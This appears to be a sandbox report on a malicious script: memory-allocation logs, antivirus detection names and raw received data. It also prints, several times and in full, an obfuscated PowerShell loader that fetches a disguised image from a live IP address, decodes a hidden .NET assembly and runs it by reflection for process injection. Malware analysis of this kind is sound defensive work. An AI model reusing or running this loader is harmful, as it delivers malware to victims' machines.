allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05106000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05107000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05108000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05109000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0510a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0510b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0510c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0510d000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0510e000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0510f000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05110000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05111000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05112000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05113000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05114000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('0mjlink = vbAhttp://91.92.254.194/imge'+'/new-image_v.jpgvbA; 0mjwebClient = New-Object System.Net.WebClient; try {'+' 0mjdownloadedData ='+' 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host vbAFailed To download data from 0mjlinkvbA -Foreg'+'roundColor Red; exit }; if (0mjdownloadedData -ne 0mjnull)'+' { 0mjimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(0mjdow'+'nloa'+'dedDat'+'a); 0mjstartFlag = vbA<<BASE64_S'+'TART>>vbA; 0mjendFlag = vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mjimageText.'+'IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimage'+'Text.IndexOf(0mjendFlag); if (0mjstartIndex -ge 0 -and 0mjendIndex -gt 0mjstartIndex) { 0mjstartInd'+'ex += '+'0mjstartFlag.Length; 0mjbase64Length = 0mjendIn'+'de'+'x - 0m'+'jstartIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstart'+'Index, 0mjbase64Length); 0mjcommandBytes = [System.'+'Convert]::FromBase64String(0mjbase64Command); '+'0mjloadedAs'+'sembly ='+' [System.Reflection.Assembly]::'+'Load(0mjcommandBytes); 0mjtype = 0mjloadedAssembly.GetType(vbARunPE'+'.Homev'+'bA); 0mjmethod = 0mjtype.GetMethod('+'vbAVAIvbA).Invoke(0mjnull,'+' [obj'+'ect[]] (vbAtxt.HGU/990'+'55/61'+'.532.59'+'.32//:ptthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAdesativadovbA,'+'vbARegAsm'+'vbA,vbAvbA)) } }Set Scriptblock 0mjlink '+'= vbAh'+'ttp://91.92'+'.254.194/imge/new-image_v.jp'+'gvbA; 0mjwebClient'+' = New-Object System.Net.WebClient; try { 0mjdownloadedData = 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host'+' vbAFailed To download data'+' from 0mjlinkvbA -ForegroundColor Red; exit }; '+'if (0mjdo'+'wnloadedData -ne'+' 0mjnull) { 0mjimageText = [System.Text.Encoding]::UTF8.G'+'etString(0mj'+'downloadedDat'+'a); 0mjstartFla'+'g = vbA<<BASE64_START>>vbA'+'; 0mjendF'+'lag '+'= vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mji'+'mageText.IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimageText.IndexOf(0mjendFlag); if (0mjstartIndex -'+'ge 0 -and 0m'+'jendInde'+'x -gt '+'0mjstartIndex) { 0mjstartIndex += 0mjstartFlag.Length; 0mjbase64Length = 0'+'mjendIn'+'dex - 0mjstar'+'tIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstartIndex, 0mjbase64Length); 0mjcommandBytes = [System.C'+'onvert]::FromBase64String(0mjbase64Command); 0mjloadedA'+'ssembly = [System.Reflection.Assembly]::Load(0mjcommandBytes);'+' 0mjtype = 0mjloadedAssembly.GetType(vbARunPE.HomevbA); 0'+'mjmethod = 0mjtype.GetMethod(vbAVAIvbA).Invoke(0mjnu'+'ll, [o'+'bject[]] (vbAtxt.HGU/99055/61.53'+'2.59.32//:p'+'tthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAde'+'sativadovbA,v'+'bARegAsmvbA,vbAvbA)) } }')-rePLAcE'0mj',[cHAr]36 -rePLAcE ([cHAr]118+[cHAr]98+[cHAr]65),[cHAr]39) |& ( $pshoME[4]+$pSHOmE[34]+'X')"
cmdline powershell -Command "(('0mjlink = vbAhttp://91.92.254.194/imge'+'/new-image_v.jpgvbA; 0mjwebClient = New-Object System.Net.WebClient; try {'+' 0mjdownloadedData ='+' 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host vbAFailed To download data from 0mjlinkvbA -Foreg'+'roundColor Red; exit }; if (0mjdownloadedData -ne 0mjnull)'+' { 0mjimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(0mjdow'+'nloa'+'dedDat'+'a); 0mjstartFlag = vbA<<BASE64_S'+'TART>>vbA; 0mjendFlag = vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mjimageText.'+'IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimage'+'Text.IndexOf(0mjendFlag); if (0mjstartIndex -ge 0 -and 0mjendIndex -gt 0mjstartIndex) { 0mjstartInd'+'ex += '+'0mjstartFlag.Length; 0mjbase64Length = 0mjendIn'+'de'+'x - 0m'+'jstartIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstart'+'Index, 0mjbase64Length); 0mjcommandBytes = [System.'+'Convert]::FromBase64String(0mjbase64Command); '+'0mjloadedAs'+'sembly ='+' [System.Reflection.Assembly]::'+'Load(0mjcommandBytes); 0mjtype = 0mjloadedAssembly.GetType(vbARunPE'+'.Homev'+'bA); 0mjmethod = 0mjtype.GetMethod('+'vbAVAIvbA).Invoke(0mjnull,'+' [obj'+'ect[]] (vbAtxt.HGU/990'+'55/61'+'.532.59'+'.32//:ptthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAdesativadovbA,'+'vbARegAsm'+'vbA,vbAvbA)) } }Set Scriptblock 0mjlink '+'= vbAh'+'ttp://91.92'+'.254.194/imge/new-image_v.jp'+'gvbA; 0mjwebClient'+' = New-Object System.Net.WebClient; try { 0mjdownloadedData = 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host'+' vbAFailed To download data'+' from 0mjlinkvbA -ForegroundColor Red; exit }; '+'if (0mjdo'+'wnloadedData -ne'+' 0mjnull) { 0mjimageText = [System.Text.Encoding]::UTF8.G'+'etString(0mj'+'downloadedDat'+'a); 0mjstartFla'+'g = vbA<<BASE64_START>>vbA'+'; 0mjendF'+'lag '+'= vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mji'+'mageText.IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimageText.IndexOf(0mjendFlag); if (0mjstartIndex -'+'ge 0 -and 0m'+'jendInde'+'x -gt '+'0mjstartIndex) { 0mjstartIndex += 0mjstartFlag.Length; 0mjbase64Length = 0'+'mjendIn'+'dex - 0mjstar'+'tIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstartIndex, 0mjbase64Length); 0mjcommandBytes = [System.C'+'onvert]::FromBase64String(0mjbase64Command); 0mjloadedA'+'ssembly = [System.Reflection.Assembly]::Load(0mjcommandBytes);'+' 0mjtype = 0mjloadedAssembly.GetType(vbARunPE.HomevbA); 0'+'mjmethod = 0mjtype.GetMethod(vbAVAIvbA).Invoke(0mjnu'+'ll, [o'+'bject[]] (vbAtxt.HGU/99055/61.53'+'2.59.32//:p'+'tthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAde'+'sativadovbA,v'+'bARegAsmvbA,vbAvbA)) } }')-rePLAcE'0mj',[cHAr]36 -rePLAcE ([cHAr]118+[cHAr]98+[cHAr]65),[cHAr]39) |& ( $pshoME[4]+$pSHOmE[34]+'X')"
Time & API Arguments Status Return Repeated

ShellExecuteExW

 show_type: 0
filepath_r: powershell
parameters: -Command "(('0mjlink = vbAhttp://91.92.254.194/imge'+'/new-image_v.jpgvbA; 0mjwebClient = New-Object System.Net.WebClient; try {'+' 0mjdownloadedData ='+' 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host vbAFailed To download data from 0mjlinkvbA -Foreg'+'roundColor Red; exit }; if (0mjdownloadedData -ne 0mjnull)'+' { 0mjimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(0mjdow'+'nloa'+'dedDat'+'a); 0mjstartFlag = vbA<<BASE64_S'+'TART>>vbA; 0mjendFlag = vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mjimageText.'+'IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimage'+'Text.IndexOf(0mjendFlag); if (0mjstartIndex -ge 0 -and 0mjendIndex -gt 0mjstartIndex) { 0mjstartInd'+'ex += '+'0mjstartFlag.Length; 0mjbase64Length = 0mjendIn'+'de'+'x - 0m'+'jstartIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstart'+'Index, 0mjbase64Length); 0mjcommandBytes = [System.'+'Convert]::FromBase64String(0mjbase64Command); '+'0mjloadedAs'+'sembly ='+' [System.Reflection.Assembly]::'+'Load(0mjcommandBytes); 0mjtype = 0mjloadedAssembly.GetType(vbARunPE'+'.Homev'+'bA); 0mjmethod = 0mjtype.GetMethod('+'vbAVAIvbA).Invoke(0mjnull,'+' [obj'+'ect[]] (vbAtxt.HGU/990'+'55/61'+'.532.59'+'.32//:ptthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAdesativadovbA,'+'vbARegAsm'+'vbA,vbAvbA)) } }Set Scriptblock 0mjlink '+'= vbAh'+'ttp://91.92'+'.254.194/imge/new-image_v.jp'+'gvbA; 0mjwebClient'+' = New-Object System.Net.WebClient; try { 0mjdownloadedData = 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host'+' vbAFailed To download data'+' from 0mjlinkvbA -ForegroundColor Red; exit }; '+'if (0mjdo'+'wnloadedData -ne'+' 0mjnull) { 0mjimageText = [System.Text.Encoding]::UTF8.G'+'etString(0mj'+'downloadedDat'+'a); 0mjstartFla'+'g = vbA<<BASE64_START>>vbA'+'; 0mjendF'+'lag '+'= vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mji'+'mageText.IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimageText.IndexOf(0mjendFlag); if (0mjstartIndex -'+'ge 0 -and 0m'+'jendInde'+'x -gt '+'0mjstartIndex) { 0mjstartIndex += 0mjstartFlag.Length; 0mjbase64Length = 0'+'mjendIn'+'dex - 0mjstar'+'tIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstartIndex, 0mjbase64Length); 0mjcommandBytes = [System.C'+'onvert]::FromBase64String(0mjbase64Command); 0mjloadedA'+'ssembly = [System.Reflection.Assembly]::Load(0mjcommandBytes);'+' 0mjtype = 0mjloadedAssembly.GetType(vbARunPE.HomevbA); 0'+'mjmethod = 0mjtype.GetMethod(vbAVAIvbA).Invoke(0mjnu'+'ll, [o'+'bject[]] (vbAtxt.HGU/99055/61.53'+'2.59.32//:p'+'tthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAde'+'sativadovbA,v'+'bARegAsmvbA,vbAvbA)) } }')-rePLAcE'0mj',[cHAr]36 -rePLAcE ([cHAr]118+[cHAr]98+[cHAr]65),[cHAr]39) |& ( $pshoME[4]+$pSHOmE[34]+'X')"
filepath: powershell
1 1 0
Avast Script:SNH-gen [Trj]
Kaspersky HEUR:Trojan-Downloader.VBS.SLoad.gen
NANO-Antivirus Trojan.Script.Vbs-heuristic.druvzi
Google Detected
ZoneAlarm HEUR:Trojan-Downloader.VBS.SLoad.gen
Varist VBS/Agent.BNM!Eldorado
AVG Script:SNH-gen [Trj]
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received žžDŠ^àÍ× *»¥Ùµ'Ò8DŽˆÆ·­û^UÕ]H,^œ`&û!ŠäSgŽõ«kÝ&iN –T ªíSÅÀâÚå•Ù–3¸ßBÜ Î}<Èhîã“\Œ Wðí³BHOÞ½*ƒux/2u?f]!–=+ÊÎBî^6’:ƒßŒRHÍ°;+†ç’?ëéuzí8/¡Wª2ß&ÏJ<ýp2¼ n‹Äð)÷£wUϯé|ZIôJ%hö²¼Ð6 gË¥y—{,Çi%{{V{³<ÌcÒêc@•ƒ Qgƒó¯åêàÕT+庺‚ °aa‰èAøæ«jÕ5:e‘[€Ä2·á<u瞾ٜ¨š²Ã§H¤UÚYNÂ6óÁ‰¿Ž1¤Uµ€nZÈàû|O~Glj‰mãm‘Ô`å՗Q|mès<ê1QÅpOªQ¤’TU¢NãÀ®üfmKøf§a–&µ#ñpsó¾®5û¬ò™ïž£žÙõïû]  &’ £wde&þþ¿®|ŸW,oáò!p®¬ {àbl n€1Ý3»D9³|ƒŠy¸†à1e¦ˆ-•^râ2ÊmE¬¨5;茩Ô$ADŽYN<µXö‹Z<WL€¾âþc8’àô:Ö\¾Ä΁ùàB&àV”l#‚ª-T ďŽ)µ%vQè=¯¾2\m, ðr:}qµrR~3ÐÖÚ<÷ÆDkÒFV7U} $Šcºö¿¶:tÓ<Q<`3I·Óé /¡Úw6949ù]ðé&5fShÌ€~EIüˆ?…]jiãÓޜ—Õ·3qék;x±føºäñҀ:1UônfÚY÷"¨P:òóӃÎ"ûÉØhۏWp<‰¹[qm¯´µí?Í?‘®ÖÅ<k{v¨V{Š¬ <žWÿ|˜ƒè’?\]&0ȱ±X2;(b ^)¯Ó$ª˜­ŠãÂ]TZæ1ªcÇ#¦Oâ $²¤Vø‘Ú›M!;Oá¬2ͧן/R‚Ú8£l}ðÖË›H‚>-²Ç©›î2uz)4’úÔ´wÃW\€*`tïd‹cŽ˜‚ ËyršÚ ÑàU':¢Áˆ‰$_éðý襤nƒü9 ¤5X+ÀKY¢Ò•óY\4 Æf¤ú• ^&þl0ÍçØє*8<ˆýÐK½HSÐQÁ7YüÍ3‚ü&ÁS\Žp)3ÊàvçÚ'Šr¡Š‘Ê:äù/±ŒÑÕ׋>ø2ùÊÈHP£¯s’•cb¹±.˜F¯¨Á$e%°*zŸ†®…’*IM±J .¯ÕD Ù7Ᾰ}##H m¶l6¥Òfƒm "ºà¼7Lñy‚F»¯­ü0jšxÖ·  Ù+¸úcb$‰gT2íc҆*ï^8ÕTu¿jÀè`ó¢©g7Ï£Åü±‰B)(£pj€q5™Š± µW =²Vz-~¢EŠÀЄETDíÛ¾fO¨B΀5nººçVÞö ñW|Rm’Ì\LÔIí€T•UT±Vïl‡D#vÖ¯â aâT@©v@«÷Îbâè©^„‚}Œ¨E.Þ/¹ÍbñíUµ4l™SHªC(#h‰çœ˜'FÑIÆûœo|Š$vdì¤^bÓÀŒåå$éÅbmb»Ì­xq6äa¾¯Œ ­B™&vQDš ¸Å™ 2~#5¤³'âKãÔí€$ÜO@p3ë:±¨ôþl[‰¢;àš¤Q»é€<ŠË*H"ˆÊÖVue¨ß?<¼jOE'é€>‡ ¢Ir.á”t(H'Ÿl¥`YÈ,JŠÆV³«'È»Ü-Õá*’¤ À Ùúaô˽É, íY£0Ë°ˆúã:Wvu…˜ÿ¶mC»m`¬Êh…s««ìkŒ ™ÛRÉÚC®»ãè0ˆ6f@ƘÑ?\ÏE*á›ð¨ oŒ?˜ÒS‹®Ô/åËDÖ 04Õáã$ bÁXÐ=†f4Ë@]0ê$.P°0žq6¢BÔ@­ œs“°`A$qf«ÃÌIf&¨ñðÎwR5°À<Z©<ÒÏŚÜò1¨¹iTƒÐøˆŸpU-êøwÇbZ(á[“d‘ÆÓÄ]#e6yïó«iÔ%@º§#ê»è£`^ӐÊv©<‹^ø5)*òAàbí©DpŠÀ
Data received Èâû·5‚þò«…X·Au¶½ñß Ñ‰ÇƝU¶ƒÔÿC×ڂ<,0»`-È?3À÷÷÷Êê%e…š<…U o5·°ãŽj ^…Õ¤×ID Úۙ‡j:ƒÖºtËê¾ôÚ]-¸––3»Óק¿J¬ Ÿy5:h˜¢eҏÄk©Æ< Xfñ‰4ÒD»uÐá"Òé’Ui¡15Å,Ãø«§~âò ÐéÖYõ,IW‹+jÕt¬ŸÂôí¨‹P±Èò*ՖZ7}~X/ðÉ%A$p•–©Ðohâ†fŸ ñ x|ÓIȪª‚»‰¯ïšš-*éõdiõ‘ª«y©»}Ð¥Ú}èû~XÔé>éá{ãӒUA•\Ñ-C‘Ï¿ló¯sëa@²/˜Ä0cTxéžËÄ`Ó<.ºåýÛÄ© Ü@9ç<eV/Q¦R`ä« ¾8àdká}>© sÿvH^Ü^ FVX€M»EuëÞÿ\íK¼²—v‘åKòk&XZ:;Onß À"ÌãH" °$×Ž¦9ˆM¡, 1¼Fý-T Y¬F0ü)iKn"¨f†ƒJ­&¡õ1nŽÊÅcb»¹ä×Èàz >ŸM?‡,ò£[Û©»ø{ã#ÃãÓit›f&3­;Xî°ã“Џ®C<Sà &²!mË ©f dU@]/®_ ÑjeQ&¥ZYuf‘ ;”‘Òúm-·Å`5ö“I§}+iÜHÊò#$tK 0"èôúâ³êôúÝ:¼ÚIc(*ª6•àZÝr/ž™iàÔ¦´èŸVò<*±FZBKnàš®*—Ów{À4ŒjN¶,j¶ª2¹ B‘¶ÇáÀcC«Ñ¾ªã‡PJÆû¡Wq¦çh^Oþùe}š%:i@¢9UEo•#o^™Þ áï<˪vu $WPŒ 6†nÑø»u¯žO¡}tÒê¢Hå¦)bৢÞ…43ù(SZ@ÌhOû¹¦úŸ U’SqD §eِEí³êÛùàeð–ŽÔÌJ;Ḧ+ÇÔ^fê×S§ÔG²ÓË, «p¨¨¯…œüR}>·Å4ÚURtðƦBª¡‰Ú;…횐KáqieFD„5,£ÔAP†÷±™ú·ŽM³G©wmpUª•o¸?Ï ¨ÓM¥Ñù€XI 3Røj©<}ð4ðs¥Ë´Ÿ,0tkV15XÙПnüà¢ÖxxšY®ÀÑ+©¥=?wÇOaý3"9uÍQI¼H,H¬UšFeA< "ðèò4qéàEi5 Œ»‰ £Ö¦É^Ä{÷ÀkA'†’Ú€û©@IÜ­¸µÛðö9²ž!á’ù“Jð4;£°Ë`Z›Ú6]ð¸é‰è|%Ö9b-“÷L¡k, ¬qxµ¦³Ä Óê"YeÚÖB¸­ò‡Œ ðKÒ2¼J՘¨*¹;½?/â9Óë<㉄~T ª  æ“_O~pk£M32$±c™e1f ‡ÒT¼û瞒PЬAb]TÎÁßu…PÕu€ÖC$¦4.5J_XmÆÏOOüq)u:gbÁ ¸.ÁË$2êg%\òʒNÒÂú×(´O4jÊ˵˜|°^µ]NtÂ#Ü0 èNò{­ôÅ —LšˆŸËu êÖd¡öېñ‚‘)‘Aòøî Ü{àeŒE3 `ÁI;àkhüF 3¤Ê‘,€ Êè¤ZÇá pW¶?£“I<-4 š}GKÅ+m <À},V‡õé˜iURoe «Íþ-¸T†p²•(&…0òÀÓûþ†HägYAÍÌ7—§5’}¦C«™dVc¤*îÉ yàѯžbž g›Ë3HÉVSaE1`~Df–¯H‘èuk3Ä%We%KmUR¼Use—ÿ{À§[¥­VÂX¶æYFÖõ] ^¼ßlZ]fŠ-n­<…Sæ:ú¹zúO³vÄà ój#…w8FµU= ÿ߬VMvª'BIve r j÷ÿGØõ§]ù2ne •cÅ)£Å|ºàæñáU•š5ÜE(ë\šéÏؑ™Hª¹µ$u÷øñ•:¢èQ‰âìP7ÇÇ­o‘¾GC µ+V·DYv<æk‚m ãŽpÒÎ&TfÕvüÓ ~€À÷eà` £…ÜT×¾X(`5Þ²¥˜úIà~˜HB½«¾ÑÐ`-8t.\_n×ï—H¶¡ ‚=ÎPJ"£Ï$]û~X"_GƒñÀcp+Á`kq¦A !$®â@°¹hR7Ó1ZÝé¢i@úž0O壷)æ€ò œ5–f$›éG§Ór)4<{ä±Ó´›Š0ÍØ¿H×N]­l~®¿LøôÕac_UŽƒ¡9ªº†X²‘`Ù!@SiG¯§BÞZBÊC.ÖP¢‡~p/­‘˳1mÄ3E"À¡ÛÛdB¡J'K°/ ŸÎ‰ÝÝP, l ®ƒw*>¢j¨ÏË"9ž"v ‹ôl,pèXª’P6Á.Ñw·ê+*Ú ¯rv1ê6pIܳ3Uµ’~7’fÜ -nïyXáwPª²XØ øaOq9Gµ6’ÜówíÎLæXc47*›·8º… Ѐ:^:4µ b)°ož¤tùwŵZv€Ge½q«›÷=°ð^<EÇ4PôÿxbSÎ&šYˆ;ËQì ¼{À=Zùqž×ÜvĦI¨‘mFrÊ( ñ€¾ó´¯¾^ `¢‰³Ó-šI@*¶KðëÒÌé)%‚°¤ø©}½þ€£0eŠÚ(VPk åY·<•€ç ç¦PmÚoñvÀ¾ci}|ŽÃß&Y¨U hs}Éþ¹_\OÈ*ÃÜ_Ç*ŽJ’ÁU‹ß L ¤ Ná[j¨_.™F•˜#Õ]½±ˆ•€P®p'â/éWQNරAÜMYž·O¦ÅÚÁ¾k#s0 O¦7åF$U*[tÅ,“`?¾UR7Tp”-¬Yä*ƒýpQg®]¤ d¯$>†2Ç·vÐŔµÀ Ðý0D“€‹Qߎ¸@©'h}s¼ÆB«Dbz÷âÿ–I T°zŸõyqO –¢Áˆõ1äPøà. ¼ ˜¬ -G¯«Ž¾ÙGZ<Ï`2´T›û @ 7œX±³ùa‚}Œ,+8«®ƒ9U ªI`Zàs\œ ¹o&6ó O§Û4cÔBºeY•þ»ÿU‰¥c"À,ÛoÏ.&Ü…V–®?õóÀ9f2n@" =M'^}†¬L­åî‘Ç%ØUí”H5†Ý!!j÷ÈhŽÅ£ß´YGâe!GÈwùà"ij¸0è0ÒnàìÚG·?>ª2ï[RAª'šãåXI¶N÷ò¥€Z«<wÀž/1XIQ¸ViŤ$ 6±Ƭó‹é›i+Ì«êcÒè~Xù¼ù™É<¢·_¦´Lº}MÈlko9èt~"$ŠMzyåó‡D`­]Hsð¼ÈÒ@RC¨»Ú‡ÕÇ=O=/„6„H’;‡r*,³›è[ƒÅñE{õÀ&›I©¥Ûº6™¶¼EÚ]ÊC1!WåêëuÛ ‹NKiü©N£Ôª¨ÁŠ°<]uö±]: ÕÑhuš¥?{´úV²štPTôRhtï×=‡I¦Ò¦Í<K¾ª9?3¥ðor©!AÊRª …໾¹Í˜¼:m4¡Qn&Zf*ÍÙ zöëÿ[ÔV!Ôm°xµíŒ<ʛ‘Q¤“ƒ±GO‰=°/§pð ¼³¡‡ÒA~ ²§úwÁEÒ(2ˆO1¡ëó?ÏhQFŠª–a{oþ¼ iÙÜäÑmÇçš ²¨#§Po¹þ˜¼hŽ¡”þ¢ÊIç©ëïŒÅ ¢Ã×èÕm[y±Ÿý«}«:ÿ‡“*hñyõ¶?h#û;öv}I¯4®ÔRz’3òö¯Tú½\“Èij±bNLk}NpGvË^pÀ$HuŸVýýŽ>/âãŵ)ÿfÒ°*~&íùuϝx„ê|gÅ Ð鑞I\(?\}˜ð-7ÙïÓè4諵ö·5rNÀeÆTgžû]ö¿AöKŸU©pe ˆ¢ÔÍý¾8ö»í~ƒì—„¶«RÀÊÀˆ¢ÔÍý¾9ùíOÚýڝ|“ë^Ս*ŽŠ;‚ûSö£_öŸÅdÖëd,XÒ(>•^À óà’ÃDØ(²N{O²?³Ýgj#rŒ°_,Fh~ξÏxWˆ³ë<OR¨›ÚƯ>¡/Ûß³ÞÝô![h¯HÀõ_eþÇøÙÝ"¬Q¨z嫓ž‚mnš·‘TŽ|+Å¿kºéË&‘6/cžC_öÇƼ@Ÿ3RàÀà~‡×ý·ð;õ(Hìxÿý°è ܺe.F|6Yõ3±2HÌO¹ÀÈåÍ|ð>‘âµïÔu½³ÌxÛñDš—›àÖ`*3~
Data received K,ë V˜-º%‰³×à æÏ"¹Øäð¼Üû?©Lé+ƒvæ]ÄWÅOlK‘]#*Œh+ší_LÌñ½n°é eÚKÓ5n$‘À^ Y^Ò¬Ôb‰ÙU0U°k‘õùá¦)$%Y˜”mÀ!J…|j°1c}[F°j4m;´¾j—j®+åùŒmSTÞS»‰V$$Å ´W$…¾ŸPÎÂÊñùV}gÜÜI0°ß„¨¾¼ÿL ¦ÑëU ™ßL±1hš>6·¢@àí M¯Ä<?ïA™ZÕ¤!™¬³ÜÐóÊør¾² n¢0tÓ4ìֆŠ+( ût¿Ï3ü;F4úÅieÔ(±jQÓ¯CÿLKÈ%gYIõP«<sŽA{T€Fâ.ˆ¨I[Ò¦E†[ۅb³Ï3<k© ± Ëdd{¯®ðH,”„ä­j—¿Ó.Ž <”ÔWCX¢$ڇU*-°Úª¼üJ}ðZMNÍd¾cÌÉS¢›µS^|¬¦¸$È(’U‹UŽ¿Î±™P27ºïÓá–q¬®:Õ¯pG¶7©;ºm *ëUÓFÌ­´Á«%²º-sȲQ³²•ØµØôéø„Ú<;µr*©bfÀs‰é%Òë4"M9/VܐłÝ|:`?¢œêTèVAQ”͋ã¡Ì=\ª²0ˆ-I·Z¿úcIâZ ²",h©û¸€RA ÒÈ÷ħ.\3ú™†æéÔ×úú`3¦(Pº…mѵµå°OWç•ÐiWQȲ,„˜ØQ ÐüâP;iõ7-#::-O&Èã¾Lú¨š"ĆhK+U ^£:—‹Fc”G,* †eõ)¯©Ÿý±o;O< $h%gÔ³~¯ç‰ÇªwY#œFv¸Q±H¨=É÷÷Êh–=$gL®¬ j±èp“S¨…Xšò<¸ÕЛSèRh^yøõÓÏ$š},j$f6Tª½ïœÙ×ø~š}hyŸ÷qí‹w¥NÕ蟇ÀS_$ŒX `£jÖÑÓÐøfž6)*‡~7»M‚8ÿ]0Ðè ÓølÐG2´ªÆÉâÁùfU’6À7v ¢»s‚Ô$z= 